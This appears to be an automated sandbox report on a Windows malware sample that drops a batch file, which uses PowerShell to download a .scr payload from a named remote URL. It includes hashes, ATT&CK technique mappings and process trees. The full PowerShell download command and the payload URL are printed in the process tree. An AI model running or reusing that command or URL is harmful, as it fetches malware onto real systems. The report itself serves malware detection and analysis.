325830948cfdcd2d877edde32f30811a76095e18d6f302748ebcf9ddb6460923

General

Target

e173dd358ec750f561ec4eec0c6d75e8709bc32fbe43a5e9a92dd0db96c82b58.exe
Size

466KB
MD5

0fdbc8c24e84eea10dc25e81765014a1
SHA1

2d566a2b94fc8b16b97200392db1bbe714c31289
SHA256

e173dd358ec750f561ec4eec0c6d75e8709bc32fbe43a5e9a92dd0db96c82b58
SHA512

3cb0c09cc5303f7842fd5ba79a118f62586c4f494a2168c6103db55697fe9dc063f866ec5ee8fc208e01cfe7d7e6b044847c824ee28ed7b4ba41d035fb7da72f
SSDEEP

12288:CgZXEAO/BUdG3gVdt7Kdm5bakhM/7xah42prW1:CgZXoZUTVdt7K0JakhM1ah42prW1

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://master-repogen.vercel.app/file/server.scr

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2692	powershell.exe
4	2692	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2692	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e173dd358ec750f561ec4eec0c6d75e8709bc32fbe43a5e9a92dd0db96c82b58.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2692	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2692	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2760	DllHost.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2800 wrote to memory of 2684	2800	e173dd358ec750f561ec4eec0c6d75e8709bc32fbe43a5e9a92dd0db96c82b58.exe	32
PID 2800 wrote to memory of 2684	2800	e173dd358ec750f561ec4eec0c6d75e8709bc32fbe43a5e9a92dd0db96c82b58.exe	32
PID 2800 wrote to memory of 2684	2800	e173dd358ec750f561ec4eec0c6d75e8709bc32fbe43a5e9a92dd0db96c82b58.exe	32
PID 2800 wrote to memory of 2684	2800	e173dd358ec750f561ec4eec0c6d75e8709bc32fbe43a5e9a92dd0db96c82b58.exe	32
PID 2684 wrote to memory of 2692	2684	cmd.exe	34
PID 2684 wrote to memory of 2692	2684	cmd.exe	34
PID 2684 wrote to memory of 2692	2684	cmd.exe	34
PID 2684 wrote to memory of 2692	2684	cmd.exe	34

C:\Users\Admin\AppData\Local\Temp\e173dd358ec750f561ec4eec0c6d75e8709bc32fbe43a5e9a92dd0db96c82b58.exe
"C:\Users\Admin\AppData\Local\Temp\e173dd358ec750f561ec4eec0c6d75e8709bc32fbe43a5e9a92dd0db96c82b58.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2800
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Dropper.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2684
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://master-repogen.vercel.app/file/server.scr', 'C:\Users\Admin\Downloads\server.scr')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2692

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Dropper.bat

Filesize
470B

MD5
8073ff57f855d5cd51346f011933d9fb

SHA1
d24fc282fb660945b87e1c41860a031f6e7ec9f6

SHA256
6bce98ce8751d6f87e97578a05e606a0b699f24c1a69b96cd28ef88d4984fe71

SHA512
9f2e04c4f8bdeab0e2075b5bc42edbe6a9ee4221fbf1ebbacd44238576e77f7b2d5f5d3ac90d433b8b6f5493fef51747405e14a5aa2cf59a4663b2cf385b4610

Download Submit
C:\Users\Admin\AppData\Local\Temp\death.jpg

Filesize
90KB

MD5
5d8d4ee19e74d88a0f24aa241dddb14f

SHA1
0172899ae844f7eba49c323c1d0d85c5888ca4d8

SHA256
598dc794a9b904fbc5f528e1ff290a54323f3598a15d063b31d48c06f71fa58f

SHA512
b863b5ae92bcf901d0fe6b9d188d65e4824acfcb3c32ba9e4e6e85727fe232df43241bed4b89698e751508f2e6b23481f6e411d8e8e88d08bfac452e01ff9d96

Download Submit
memory/2760-5-0x00000000000E0000-0x00000000000E2000-memory.dmp

Filesize
8KB

Download
memory/2760-13-0x0000000000530000-0x0000000000531000-memory.dmp

Filesize
4KB

Download
memory/2760-41-0x0000000000530000-0x0000000000531000-memory.dmp

Filesize
4KB

Download
memory/2800-4-0x0000000000BF0000-0x0000000000BF2000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing